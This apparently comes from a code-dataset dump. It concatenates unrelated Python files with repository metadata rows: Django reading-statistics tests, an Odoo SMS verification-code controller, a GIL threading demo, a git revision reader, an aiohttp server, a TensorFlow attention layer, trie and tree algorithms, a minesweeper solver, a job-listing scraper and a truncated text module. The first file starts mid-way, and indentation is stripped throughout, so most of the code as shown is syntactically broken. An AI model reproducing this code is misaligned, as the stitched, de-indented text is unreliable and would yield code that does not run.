# Another finished reading (so there's a chart)
c2 = IndividualCreatorFactory()
pub2 = PublicationFactory()
PublicationRoleFactory(publication=pub2, creator=c2, role_name="")
# It'll cut off any with only 1 reading, so:
ReadingFactory.create_batch(
2, publication=pub2, start_date=d, end_date=d, is_finished=True
)
# An unfinished reading for the same author - they should still be in the
# chart though, because they have one finished reading.
ReadingFactory(publication=pub2, start_date=d, end_date=d, is_finished=False)
# An unfinished reading
c3 = IndividualCreatorFactory()
pub3 = PublicationFactory()
PublicationRoleFactory(publication=pub3, creator=c3, role_name="")
# It'll cut off any with only 1 reading, so:
ReadingFactory.create_batch(
2, publication=pub3, start_date=d, end_date=d, is_finished=False
)
data = most_read_creators_card()
self.assertIn("object_list", data)
self.assertEqual(len(data["object_list"]), 2)
self.assertEqual(data["object_list"][0], c1)
self.assertEqual(data["object_list"][0].num_readings, 3)
self.assertEqual(data["object_list"][1], c2)
self.assertEqual(data["object_list"][1].num_readings, 2)
class MostVisitedVenuesTestCase(TestCase):
def test_returns_queryset(self):
"It should return 10 items by default."
for i in range(11):
MiscEventFactory(venue=VenueFactory())
venues = most_visited_venues()
self.assertEqual(len(venues), 10)
def test_num(self):
"It should return `num` items."
for i in range(4):
MiscEventFactory(venue=VenueFactory())
venues = most_visited_venues(num=3)
self.assertEqual(len(venues), 3)
class MostVisitedVenuesCardTestCase(TestCase):
def test_returns_correct_data(self):
for i in range(2, 13):
# It'll cut off any with only 1 reading, so:
MiscEventFactory.create_batch(i, venue=VenueFactory())
data = most_visited_venues_card()
self.assertIn("card_title", data)
self.assertIn("score_attr", data)
self.assertIn("object_list", data)
self.assertEqual(data["card_title"], "Most visited venues")
self.assertEqual(data["score_attr"], "num_visits")
self.assertEqual(len(data["object_list"]), 10)
def test_num(self):
"It should return `num` items."
for i in range(2, 6):
# It'll cut off any with only 1 reading, so:
MiscEventFactory.create_batch(i, venue=VenueFactory())
data = most_visited_venues_card(num=3)
self.assertIn("object_list", data)
self.assertEqual(len(data["object_list"]), 3)
| [
"[email protected]"
] | |
89dece8d86d548eb18d50cf9020cc5d85d9c4d93 | 4b4d21f6a2aaf8cb0ece595e4aaf9cb705ffdd49 | /marketing_message/controllers/controllers.py | c83db22f29b37ed9ac02bcf44de219ae2e23a33a | [] | no_license | sc4you/odoo-project-10.0 | e8c82b4cd42c0672e996561e75e0f9d0717821fa | bca7e400b6316bcbcefe6f0d088cb97a28f644bb | refs/heads/master | 2020-03-21T13:41:08.042847 | 2018-05-15T07:41:58 | 2018-05-15T07:41:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,270 | py | # -*- coding: utf-8 -*-
import babel.dates
import time, json
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
import werkzeug.urls
from werkzeug.exceptions import NotFound
import random
from odoo import http
from odoo import tools
from odoo.http import request
from odoo.tools.translate import _
from odoo.exceptions import UserError, ValidationError
import httplib
import urllib
import json
# 服务条款
class SmsEvent(http.Controller):
def __init__(self):
param = request.env()['ir.config_parameter']
self.account = param.get_param('account') or ''
self.password = param.get_param('password') or ''
self.host_sign = param.get_param('host_sign') or ''
self.host_marketing = param.get_param('host_marketing') or ''
self.sms_heard = param.get_param('sms_heard') or ''
# 发送请求
def send_post(self, datas, host, sms_send_uri):
try:
datas = json.dumps(datas)
"""发送post请求"""
headers = {"Content-type": "application/json"}
conn = httplib.HTTPConnection(host, port=80, timeout=30)
conn.request("POST", sms_send_uri, datas, headers)
response = conn.getresponse()
response_str = response.read()
conn.close()
return response_str
except Exception:
return False
# 发送短信验证码
def commit_send_message(self, tel, code):
sms_send_uri = "/msg/variable/json"
phone = tel
code = code
params = phone + ',' + code
msg = self.sms_heard + u"您好!验证码是:{$var}"
print self.account
print self.account
datas = {
'account': self.account,
'password': self.password,
'msg': msg,
'params': params
}
send_result = self.send_post(datas, self.host_sign, sms_send_uri)
print send_result
if not send_result:
return False
else:
sort_data = json.loads(send_result)
print sort_data
if int(sort_data["code"]) == 0:
return code
else:
raise UserError(_(sort_data['errorMsg']))
| [
"[email protected]"
] | |
0961c7df4a2719e2dfeeece2c5a57cf3f59e263c | 2cb507ecd6629b9ff457a36e462f987913d94c1a | /python核心技术与实战/23/gil.py | f3ccf2898fadf6e776549b48a927183257a39720 | [
"Apache-2.0"
] | permissive | youaresherlock/PythonPractice | 6869e0a5949675198826e5a07552237a636d6f5b | 2e22d3fdcb26353cb0d8215c150e84d11bc9a022 | refs/heads/master | 2021-08-16T03:09:44.203035 | 2021-08-02T07:40:00 | 2021-08-02T07:40:00 | 146,625,560 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,159 | py | #!usr/bin/python
# -*- coding:utf8 -*-
import time
from threading import Thread
import sys
import threading
# 单线程版
def CountDown(n):
while n > 0:
n -= 1
if __name__ == "__main__":
n = 3000000
start_time = time.perf_counter()
CountDown(n)
end_time = time.perf_counter()
print("n = {},单线程版耗时{}".format(n, end_time-start_time))
# 多线程版
start_time = time.perf_counter()
t1 = Thread(target=CountDown, args = [n//2])
t2 = Thread(target=CountDown, args = [n//2])
t1.start()
t2.start()
t1.join()
t2.join()
end_time = time.perf_counter()
print("n = {},多线程版耗时{}".format(n, end_time-start_time))
# 对象引用计数
for k in range(100):
a = []
b = a
print(sys.getrefcount(a))
# 线程安全
n = 0
def foo():
global n
n += 1
threads = []
for i in range(100):
t = threading.Thread(target=foo)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
print(n) | [
"[email protected]"
] | |
58ce61b7f582ce7941345cabdd91cbb99c06692c | 78ee2d20722287f547c406a1cff1efc36d020ba3 | /flare_portal/versioning.py | b5ae7e3705b2d24587dd22d5d6233ad8eded23e8 | [
"MIT"
] | permissive | flare-kcl/flare-portal | db660b4ccc39a6f125d548fc9efb21026f097563 | a1cef9d22ba3f1bafac55bb6ee1c8223425101dd | refs/heads/main | 2023-07-24T10:00:27.807734 | 2022-07-19T02:08:38 | 2022-07-19T02:08:38 | 305,943,258 | 1 | 2 | MIT | 2023-07-03T14:40:33 | 2020-10-21T07:30:12 | Python | UTF-8 | Python | false | false | 2,608 | py | """Provides functions to fetch versions from Git
Copied from Raven Python
https://github.com/getsentry/raven-python/blob/d7d14f61b7fb425bcb15512f659626648c494f98/raven/utils/compat.py
"""
import os.path
class InvalidGitRepository(Exception):
pass
def fetch_git_sha(path: str, head: str = None) -> str:
"""
>>> fetch_git_sha(os.path.dirname(__file__))
"""
if not head:
head_path = os.path.join(path, ".git", "HEAD")
if not os.path.exists(head_path):
raise InvalidGitRepository(
"Cannot identify HEAD for git repository at %s" % (path,)
)
with open(head_path, "r") as fp:
head = str(fp.read()).strip()
if head.startswith("ref: "):
head = head[5:]
revision_file = os.path.join(path, ".git", *head.split("/"))
else:
return head
else:
revision_file = os.path.join(path, ".git", "refs", "heads", head)
if not os.path.exists(revision_file):
if not os.path.exists(os.path.join(path, ".git")):
raise InvalidGitRepository(
"%s does not seem to be the root of a git repository" % (path,)
)
# Check for our .git/packed-refs' file since a `git gc` may have run
# https://git-scm.com/book/en/v2/Git-Internals-Maintenance-and-Data-Recovery
packed_file = os.path.join(path, ".git", "packed-refs")
if os.path.exists(packed_file):
with open(packed_file) as fh:
for line in fh:
line = line.rstrip()
if line and line[:1] not in ("#", "^"):
try:
revision, ref = line.split(" ", 1)
except ValueError:
continue
if ref == head:
return str(revision)
raise InvalidGitRepository(
'Unable to find ref to head "%s" in repository' % (head,)
)
with open(revision_file) as fh:
return str(fh.read()).strip()
def fetch_package_version(dist_name: str) -> str:
"""
>>> fetch_package_version('sentry')
"""
try:
# Importing pkg_resources can be slow, so only import it
# if we need it.
import pkg_resources
except ImportError:
# pkg_resource is not available on Google App Engine
raise NotImplementedError(
"pkg_resources is not available " "on this Python install"
)
dist = pkg_resources.get_distribution(dist_name)
return dist.version
| [
"[email protected]"
] | |
ea5d5e55d54477a28c3d0d03081e37950effcb73 | ca17adac27ce0fc199a111db0e786bdbfd24f849 | /02-asyncio-basic/e02-http-server.py | fa21cd3155f88612807884c45b0db4c6eeb30ad7 | [] | no_license | genzj/asyncio-training-course | 862c1edb19bd3d25cb8a927fdb9942a9838c8d80 | 34e72a51f79945709fbd496391295e7cd92ec8e1 | refs/heads/master | 2023-08-08T05:25:01.438483 | 2023-07-17T08:53:59 | 2023-07-17T08:59:14 | 150,000,887 | 1 | 2 | null | 2023-07-25T23:36:11 | 2018-09-23T16:05:10 | Python | UTF-8 | Python | false | false | 353 | py | # -*- encoding: utf-8 -*-
from aiohttp import web
async def handle(request):
name = request.match_info.get('name', "Anonymous")
text = "Hello, " + name
return web.Response(text=text)
app = web.Application()
app.add_routes([web.get('/', handle),
web.get('/{name}', handle)])
web.run_app(app, host='127.0.0.1', port=5000)
| [
"[email protected]"
] | |
58f4c40eb8c52f99c0002350e82dc95a31f3baa3 | 180dc578d12fff056fce1ef8bd1ba5c227f82afc | /official/legacy/transformer/attention_layer.py | fcdce774b03f1b27cdf8350104946a44372bf458 | [
"Apache-2.0"
] | permissive | jianzhnie/models | 6cb96c873d7d251db17afac7144c4dbb84d4f1d6 | d3507b550a3ade40cade60a79eb5b8978b56c7ae | refs/heads/master | 2023-07-12T05:08:23.314636 | 2023-06-27T07:54:20 | 2023-06-27T07:54:20 | 281,858,258 | 2 | 0 | Apache-2.0 | 2022-03-27T12:53:44 | 2020-07-23T05:22:33 | Python | UTF-8 | Python | false | false | 7,119 | py | # Copyright 2023 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of multiheaded attention and self-attention layers."""
import math
import tensorflow as tf
from official.modeling import tf_utils
class Attention(tf.keras.layers.Layer):
"""Multi-headed attention layer."""
def __init__(self, hidden_size, num_heads, attention_dropout):
"""Initialize Attention.
Args:
hidden_size: int, output dim of hidden layer.
num_heads: int, number of heads to repeat the same attention structure.
attention_dropout: float, dropout rate inside attention for training.
"""
if hidden_size % num_heads:
raise ValueError(
"Hidden size ({}) must be divisible by the number of heads ({})."
.format(hidden_size, num_heads))
super(Attention, self).__init__()
self.hidden_size = hidden_size
self.num_heads = num_heads
self.attention_dropout = attention_dropout
def build(self, input_shape):
"""Builds the layer."""
# Layers for linearly projecting the queries, keys, and values.
size_per_head = self.hidden_size // self.num_heads
def _glorot_initializer(fan_in, fan_out):
limit = math.sqrt(6.0 / (fan_in + fan_out))
return tf.keras.initializers.RandomUniform(minval=-limit, maxval=limit)
attention_initializer = _glorot_initializer(input_shape.as_list()[-1],
self.hidden_size)
self.query_dense_layer = tf.keras.layers.EinsumDense(
"BTE,ENH->BTNH",
output_shape=(None, self.num_heads, size_per_head),
kernel_initializer=tf_utils.clone_initializer(attention_initializer),
bias_axes=None,
name="query")
self.key_dense_layer = tf.keras.layers.EinsumDense(
"BTE,ENH->BTNH",
output_shape=(None, self.num_heads, size_per_head),
kernel_initializer=tf_utils.clone_initializer(attention_initializer),
bias_axes=None,
name="key")
self.value_dense_layer = tf.keras.layers.EinsumDense(
"BTE,ENH->BTNH",
output_shape=(None, self.num_heads, size_per_head),
kernel_initializer=tf_utils.clone_initializer(attention_initializer),
bias_axes=None,
name="value")
output_initializer = _glorot_initializer(self.hidden_size, self.hidden_size)
self.output_dense_layer = tf.keras.layers.EinsumDense(
"BTNH,NHE->BTE",
output_shape=(None, self.hidden_size),
kernel_initializer=output_initializer,
bias_axes=None,
name="output_transform")
super(Attention, self).build(input_shape)
def get_config(self):
return {
"hidden_size": self.hidden_size,
"num_heads": self.num_heads,
"attention_dropout": self.attention_dropout,
}
def call(self,
query_input,
source_input,
bias,
training,
cache=None,
decode_loop_step=None):
"""Apply attention mechanism to query_input and source_input.
Args:
query_input: A tensor with shape [batch_size, length_query, hidden_size].
source_input: A tensor with shape [batch_size, length_source,
hidden_size].
bias: A tensor with shape [batch_size, 1, length_query, length_source],
the attention bias that will be added to the result of the dot product.
training: A bool, whether in training mode or not.
cache: (Used during prediction) A dictionary with tensors containing
results of previous attentions. The dictionary must have the items:
{"k": tensor with shape [batch_size, i, heads, dim_per_head],
"v": tensor with shape [batch_size, i, heads, dim_per_head]} where
i is the current decoded length for non-padded decode, or max
sequence length for padded decode.
decode_loop_step: An integer, step number of the decoding loop. Used only
for autoregressive inference on TPU.
Returns:
Attention layer output with shape [batch_size, length_query, hidden_size]
"""
# Linearly project the query, key and value using different learned
# projections. Splitting heads is automatically done during the linear
# projections --> [batch_size, length, num_heads, dim_per_head].
query = self.query_dense_layer(query_input)
key = self.key_dense_layer(source_input)
value = self.value_dense_layer(source_input)
if cache is not None:
# Combine cached keys and values with new keys and values.
if decode_loop_step is not None:
cache_k_shape = cache["k"].shape.as_list()
indices = tf.reshape(
tf.one_hot(decode_loop_step, cache_k_shape[1], dtype=key.dtype),
[1, cache_k_shape[1], 1, 1])
key = cache["k"] + key * indices
cache_v_shape = cache["v"].shape.as_list()
indices = tf.reshape(
tf.one_hot(decode_loop_step, cache_v_shape[1], dtype=value.dtype),
[1, cache_v_shape[1], 1, 1])
value = cache["v"] + value * indices
else:
key = tf.concat([tf.cast(cache["k"], key.dtype), key], axis=1)
value = tf.concat([tf.cast(cache["v"], value.dtype), value], axis=1)
# Update cache
cache["k"] = key
cache["v"] = value
# Scale query to prevent the dot product between query and key from growing
# too large.
depth = (self.hidden_size // self.num_heads)
query *= depth**-0.5
# Calculate dot product attention
logits = tf.einsum("BTNH,BFNH->BNFT", key, query)
logits += bias
# Note that softmax internally performs math operations using float32
# for numeric stability. When training with float16, we keep the input
# and output in float16 for better performance.
weights = tf.nn.softmax(logits, name="attention_weights")
if training:
weights = tf.nn.dropout(weights, rate=self.attention_dropout)
attention_output = tf.einsum("BNFT,BTNH->BFNH", weights, value)
# Run the outputs through another linear projection layer. Recombining heads
# is automatically done --> [batch_size, length, hidden_size]
attention_output = self.output_dense_layer(attention_output)
return attention_output
class SelfAttention(Attention):
"""Multiheaded self-attention layer."""
def call(self,
query_input,
bias,
training,
cache=None,
decode_loop_step=None):
return super(SelfAttention, self).call(query_input, query_input, bias,
training, cache, decode_loop_step)
| [
"[email protected]"
] | |
79700ce48d4aacbecddc068d807ecf3f56d9dc9c | c7a1470d2f6a15265e1f884c86439dc6d98b4484 | /LintCode/trie/0442_Implement_Trie_(Prefix_Tree).py | 7a674f32a78d465c8b92d461ef3d7d86a6c3d96c | [] | no_license | GuanYangCLU/AlgoTestForPython | 5239774fb6c840f3d65c4e4290ce8125fe8c94d3 | dddbc8115f69dec636c62c755f02905c469155e0 | refs/heads/master | 2022-01-19T15:03:54.835403 | 2021-12-30T02:19:37 | 2021-12-30T02:19:37 | 122,312,195 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,196 | py | class TrieNode:
def __init__(self):
self.children = {}
self.isWord = False
class Trie:
def __init__(self):
# do intialization if necessary
self.root = TrieNode()
"""
@param: word: a word
@return: nothing
"""
def insert(self, word):
# write your code here
node = self.root
for c in word:
if c not in node.children:
node.children[c] = TrieNode()
node = node.children[c]
node.isWord = True
def find(self, word):
node = self.root
for c in word:
if c not in node.children:
return None
node = node.children[c]
return node
"""
@param: word: A string
@return: if the word is in the trie.
"""
def search(self, word):
# write your code here
res = self.find(word)
return False if not res else res.isWord
"""
@param: prefix: A string
@return: if there is any word in the trie that starts with the given prefix.
"""
def startsWith(self, prefix):
# write your code here
return self.find(prefix) is not None
| [
"[email protected]"
] | |
462ac9a85d6bc6fb7b67357293dc32fc8f1a8490 | 0f9c9e4c60f28aa00aff8b80e1e4c142c61d24ce | /Python/LeetCode/102_binary_tree_level_order_traversal.py | 9bf5ae9c253e87223e6611d5901e3a0a777bd81d | [] | no_license | shouliang/Development | c56fcc69e658393c138b63b507b96c48232128d5 | b7e3b02c50d54515e584cb18dff83109224245d0 | refs/heads/master | 2020-03-22T09:14:51.070228 | 2019-08-29T02:50:26 | 2019-08-29T02:50:26 | 139,825,052 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,498 | py | '''
二叉树按层次遍历
102. Binary Tree Level Order Traversal:https://leetcode.com/problems/binary-tree-level-order-traversal/
思路: 使用队列这种数据结构:首先根节点进入队列,然后在队列头部弹出节点的同时,将其左右分支依次插入队列的尾部,
直至队列为空
其实这就是图的bfs,但是二叉树就是一种特殊的图
'''
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def levelOrder(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
if not root:
return []
result = []
queue = [] # 队列
queue.append(root) # 根节点进入队列
while queue:
cur_level = []
level_size = len(queue)
for _ in range(level_size): # 遍历当前层,处理完当前层,再将当前层的一维数组加入到二维结果中
node = queue.pop(0) # 在队列头部弹出节点的同时,将其左右分支依次append()到队列的尾部
cur_level.append(node.val)
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
result.append(cur_level)
return result
class Solution2(object):
def levelOrder(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
if not root:
return []
result = []
queue = [] # 队列
queue.append(root) # 根节点进入队列
while queue:
node = queue.pop(0) # 在队列头部弹出节点的同时,将其左右分支依次append()到队列的尾部
result.append(node.val) # 处理结点,访问其相邻的节点并进入队列
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
return result
s = Solution()
root = TreeNode(3)
treeNode1 = TreeNode(9)
treeNode2 = TreeNode(20)
root.left = treeNode1
root.right = treeNode2
treeNode3 = TreeNode(15)
treeNode4 = TreeNode(7)
treeNode2.left = treeNode3
treeNode2.right = treeNode4
ret = s.levelOrder(root)
print(ret)
s2 = Solution2()
ret = s2.levelOrder(root)
print(ret)
| [
"[email protected]:node/hunqing.git"
] | [email protected]:node/hunqing.git |
3703f80c8a35f44e25ab5acfc87a2c94b2001201 | 876de904572c611b8cbad21f50877cdc812f2946 | /Leetcode/529. 扫雷游戏.py | 3e649e9aaf806904b938e610485bcf270d5df164 | [
"MIT"
] | permissive | QDylan/Learning- | 66a33de0e15f26672fb63c0b393866721def27ae | f09e0aa3de081883b4a7ebfe4d31b5f86f24b64f | refs/heads/master | 2023-02-08T02:34:26.616116 | 2020-12-25T05:02:32 | 2020-12-25T05:02:32 | 263,805,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,152 | py | # -*- coding: utf-8 -*-
"""
@Time : 2020/8/20 10:17
@Author : QDY
@FileName: 529. 扫雷游戏.py
@Software: PyCharm
"""
"""
让我们一起来玩扫雷游戏!
给定一个代表游戏板的二维字符矩阵。'M'代表一个未挖出的地雷,'E'代表一个未挖出的空方块,
'B'代表没有相邻(上,下,左,右,和所有4个对角线)地雷的已挖出的空白方块,
数字('1' 到 '8')表示有多少地雷与这块已挖出的方块相邻,'X'则表示一个已挖出的地雷。
现在给出在所有未挖出的方块中('M'或者'E')的下一个点击位置(行和列索引),根据以下规则,返回相应位置被点击后对应的面板:
如果一个地雷('M')被挖出,游戏就结束了- 把它改为'X'。
如果一个没有相邻地雷的空方块('E')被挖出,修改它为('B'),并且所有和其相邻的未挖出方块都应该被递归地揭露。
如果一个至少与一个地雷相邻的空方块('E')被挖出,修改它为数字('1'到'8'),表示相邻地雷的数量。
如果在此次点击中,若无更多方块可被揭露,则返回面板。
示例 1:
输入:
[['E', 'E', 'E', 'E', 'E'],
['E', 'E', 'M', 'E', 'E'],
['E', 'E', 'E', 'E', 'E'],
['E', 'E', 'E', 'E', 'E']]
Click : [3,0]
输出:
[['B', '1', 'E', '1', 'B'],
['B', '1', 'M', '1', 'B'],
['B', '1', '1', '1', 'B'],
['B', 'B', 'B', 'B', 'B']]
解释:
示例 2:
输入:
[['B', '1', 'E', '1', 'B'],
['B', '1', 'M', '1', 'B'],
['B', '1', '1', '1', 'B'],
['B', 'B', 'B', 'B', 'B']]
Click : [1,2]
输出:
[['B', '1', 'E', '1', 'B'],
['B', '1', 'X', '1', 'B'],
['B', '1', '1', '1', 'B'],
['B', 'B', 'B', 'B', 'B']]
解释:
注意:
输入矩阵的宽和高的范围为 [1,50]。
点击的位置只能是未被挖出的方块 ('M' 或者 'E'),这也意味着面板至少包含一个可点击的方块。
输入面板不会是游戏结束的状态(即有地雷已被挖出)。
简单起见,未提及的规则在这个问题中可被忽略。例如,当游戏结束时你不需要挖出所有地雷,考虑所有你可能赢得游戏或标记方块的情况。
"""
from collections import deque
class Solution:
def updateBoard(self, board, click):
if board[click[0]][click[1]] == 'M':
board[click[0]][click[1]] = 'X'
return board
h, w = len(board), len(board[0])
def mine_count(x, y):
res = 0
for dx in (-1, 1, 0):
for dy in (-1, 1, 0):
if 0 <= x + dx < h and 0 <= y + dy < w and board[x + dx][y + dy] in ('M', 'X'):
res += 1
return res
def dfs(x, y):
board[x][y] = mine_count(x, y)
if board[x][y] == 0:
board[x][y] = 'B'
for dx in (-1, 1, 0):
for dy in (-1, 1, 0):
nxt_x, nxt_y = x + dx, y + dy
if 0 <= nxt_x < h and 0 <= nxt_y < w and board[nxt_x][nxt_y] == 'E':
dfs(nxt_x, nxt_y)
else:
board[x][y] = str(board[x][y])
# dfs(click[0],click[1])
q = deque([(click[0], click[1])])
while q:
length = len(q)
for i in range(length):
x, y = q.popleft()
board[x][y] = mine_count(x, y)
if board[x][y] == 0:
board[x][y] = 'B'
for dx in (-1, 1, 0):
for dy in (-1, 1, 0):
nxt_x, nxt_y = x + dx, y + dy
if 0 <= nxt_x < h and 0 <= nxt_y < w and board[nxt_x][nxt_y] == 'E':
q.append((nxt_x, nxt_y))
board[nxt_x][nxt_y] = 'B'
else:
board[x][y] = str(board[x][y])
return board
| [
"[email protected]"
] | |
a3a216ba5eb2add7fd1e92e28f32ec90873d2f02 | f7d4993c3f9d840b3505e82567e673de00d91afc | /Code/rearrange.py | 95a3ffe7b898c2f242d8bb2a8905229d5b2251a6 | [] | no_license | Andre-Williams22/CS-1.2-Intro-Data-Structures | 026bb08c219ffcb7bafe43d3ea8426f821d6bc5c | a9effc2257a539456688c408ec4ae9e4d4d67e11 | refs/heads/master | 2022-12-10T00:12:31.879273 | 2019-12-12T07:10:33 | 2019-12-12T07:10:33 | 216,670,821 | 0 | 0 | null | 2022-09-23T22:30:43 | 2019-10-21T21:44:10 | Python | UTF-8 | Python | false | false | 1,080 | py | import random
import sys
# a = input('please type a word: ')
# b = input('please type a word: ')
# c = input('please type a word: ')
# d = input('please type a word: ')
# e = input('please type a word: ')
# words = []
# words.append(a)
# words.append(b)
# words.append(c)
# words.append(d)
# words.append(e)
# print ("The list before shuffling is : ", end="")
# for i in range(0, len(words)):
# print(words[i], end=" ")
# print("\r")
# random.shuffle(words)
# print(random.choice(words))
# # Printing list after shuffling
# print ("The list after shuffling is : ", end="")
# for i in range(0, len(words)):
# print (words[i], end=" ")
# print("\r")
def rearrange(words):
result = []
for i in range(len(words)):
word = random.choice(words)
result.append(word)
words.remove(word)
result = result [:-1]
return(result)
def reverse(words):
new_list = words[::-1]
print(new_list)
if __name__ == '__main__':
words = list(sys.argv[1:])
temp = rearrange(words)
print(temp)
print(reverse(temp)) | [
"[email protected]"
] | |
85d6d96659e6ab8df9179e891d05df56649e2e6d | a8062308fb3bf6c8952257504a50c3e97d801294 | /problems/N431_Encode_Nary_Tree_To_Binary_Tree.py | 29be7e11dec99008b385e8fc593469702e866409 | [] | no_license | wan-catherine/Leetcode | 650d697a873ad23c0b64d08ad525bf9fcdb62b1b | 238995bd23c8a6c40c6035890e94baa2473d4bbc | refs/heads/master | 2023-09-01T00:56:27.677230 | 2023-08-31T00:49:31 | 2023-08-31T00:49:31 | 143,770,000 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,213 | py | """
For any node in the N_ary tree:
his first child to Binary Tree's left child
all other children will be this first child(left child of BT)'s right child.
"""
class Node:
def __init__(self, val=None, children=None):
self.val = val
self.children = children
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Codec:
def encode(self, root):
"""Encodes an n-ary tree to a binary tree.
:type root: Node
:rtype: TreeNode
"""
if not root:
return
t = TreeNode(root.val)
if root.children:
t.left = self.encode(root.children[0])
cur = t.left
for node in root.children[1:]:
cur.right = self.encode(node)
cur = cur.right
return t
def decode(self, data):
"""Decodes your binary tree to an n-ary tree.
:type data: TreeNode
:rtype: Node
"""
if not data:
return
root = Node(data.val, [])
cur = data.left
while cur:
root.children.append(self.decode(cur))
cur = cur.right
return root | [
"[email protected]"
] | |
88d3dd854018f601e7960c53e13223c135447a52 | 9db281fbed35bb8384eeacaa81d1a32a9dcc5cca | /class-17/demo/monster-jobs/monster_jobs/scraper.py | 0bb9e23c6da0da5a1287792a996e2dcec15b38c1 | [] | no_license | corey-marchand/seattle-python-401d14 | aab3f48c82229f1958989ce8318de60b9abbe4e2 | ae9ffebc9e5250cb5ec1760fd7764da0d3ad4e4c | refs/heads/master | 2022-11-15T16:09:37.248530 | 2020-07-09T19:10:49 | 2020-07-09T19:10:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,355 | py | import requests
from bs4 import BeautifulSoup
# Send a request to Monster webpage
URL = 'https://www.monster.com/jobs/search/?q=software-engineer&where=Seattle__2C-WA'
response = requests.get(URL)
# print(dir(response))
# Extract content
content = response.content
# Convert to BS object
soup = BeautifulSoup(content, 'html.parser')
# Find an element
results = soup.find(id='SearchResults')
# print(results.prettify())
jobs_list = results.find_all('section', class_='card-content')
# print(len(jobs_list))
final_results = []
for job in jobs_list:
job_dict = {'title': '', 'location':'', 'company':''}
found_title = job.find('h2', class_='title')
if found_title:
title = found_title.text.strip()
job_dict['title'] = title
found_location = job.find('div', class_='location')
if found_location:
location = found_location.text.strip()
job_dict['location'] = location
found_company = job.find('div', class_='company')
if found_company:
company = found_company.text.strip()
job_dict['company'] = company
final_results.append(job_dict)
# print(title)
# print('********************************')
# print(location)
# print('********************************')
# print(company)
# print('\n ############################# \n')
print(final_results)
| [
"[email protected]"
] | |
5397b361705d553e3e3310f32c847b29f535c167 | 60d5ea4f007d49768d250ef394003f554003e4d0 | /python/Depth-first Search/116.Populating Next Right Pointers in Each Node.py | 885f028bc97eeb83c99f1867befd8577674b88a1 | [] | no_license | EvanJamesMG/Leetcode | dd7771beb119ea1250dbb3b147a09053298cd63b | fa638c7fda3802e9f4e0751a2c4c084edf09a441 | refs/heads/master | 2021-01-10T17:11:10.896393 | 2017-12-01T16:04:44 | 2017-12-01T16:04:44 | 46,968,756 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,655 | py | # coding=utf-8
'''
Given a binary tree
struct TreeLinkNode {
TreeLinkNode *left;
TreeLinkNode *right;
TreeLinkNode *next;
}
Populate each next pointer to point to its next right node. If there is no next right node, the next pointer should be set to NULL.
Initially, all next pointers are set to NULL.
Note:
You may only use constant extra space.
You may assume that it is a perfect binary tree (ie, all leaves are at the same level, and every parent has two children).
For example,
Given the following perfect binary tree,
1
/ \
2 3
/ \ / \
4 5 6 7
After calling your function, the tree should look like:
1 -> NULL
/ \
2 -> 3 -> NULL
/ \ / \
4->5->6->7 -> NULL
'''
# Definition for singly-linked list.
'''
深度优先搜索
'''
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
'''
一个递归就搞定了,就是递归让每一个节点他的左右子树通过next链接,直至到最后一层,
然后递归左右节点,继续让他们的左右子树通过next链接。
'''
class Solution(object):
def connect(self, root):
"""
:type root: TreeLinkNode
:rtype: nothing
"""
if root:
LR = root.left
RL = root.right
while LR and RL:
LR.next = RL
LR = LR.right
RL = RL.left
self.connect(root.left)
self.connect(root.right)
| [
"[email protected]"
] | |
83aafba4187bb26dfef831f2cb3ecf91c7677d01 | 04dddbf04893913b0b24c6c02ebd2672b774a616 | /다이나믹 프로그래밍/11052 카드 구매하기.py | 565e7ec0c89ae6471533ed01d0209c88d36b7020 | [] | no_license | hatssww/BOJ | ca16345dbe24641e1ca5adee136a858a64a080b0 | bd7363d5c84de281de9b34667e9c0b76a904cffc | refs/heads/main | 2023-05-24T22:23:35.127397 | 2021-06-08T23:36:40 | 2021-06-08T23:36:40 | 370,254,375 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | import sys
n = int(sys.stdin.readline())
p = [0] + list(map(int, sys.stdin.readline().split()))
d = [0] * (n + 1)
d[1] = p[1]
for i in range(2, n + 1):
for j in range(1, i + 1):
if d[i] < d[i - j] + p[j]:
d[i] = d[i - j] + p[j]
print(d[n]) | [
"[email protected]"
] | |
810c374d5845fa02cb9141659fad67f933c09195 | 3abe7b4d572ae81a8222996821569bf3a684ec14 | /text/__init__.py | e9461d87f13166dac13aea90ab80aead3a0ef212 | [
"BSD-3-Clause",
"MIT"
] | permissive | creotiv/RussianTTS-Tacotron2 | 6c8defdd5a9cafdd46b71f8006162c4bab586d0f | 8ac15eea9450d141cb84d4d1a96b600f43d206c9 | refs/heads/master | 2023-06-01T09:43:12.209652 | 2021-06-10T12:54:24 | 2021-06-10T12:54:24 | 334,964,314 | 13 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,385 | py | """ from https://github.com/keithito/tacotron """
import re
from text import cleaners
from text.symbols import symbols, ctc_symbols
# Mappings from symbol to numeric ID and vice versa:
symbol_to_id = {s: i for i, s in enumerate(symbols)}
_id_to_symbol = {i: s for i, s in enumerate(symbols)}
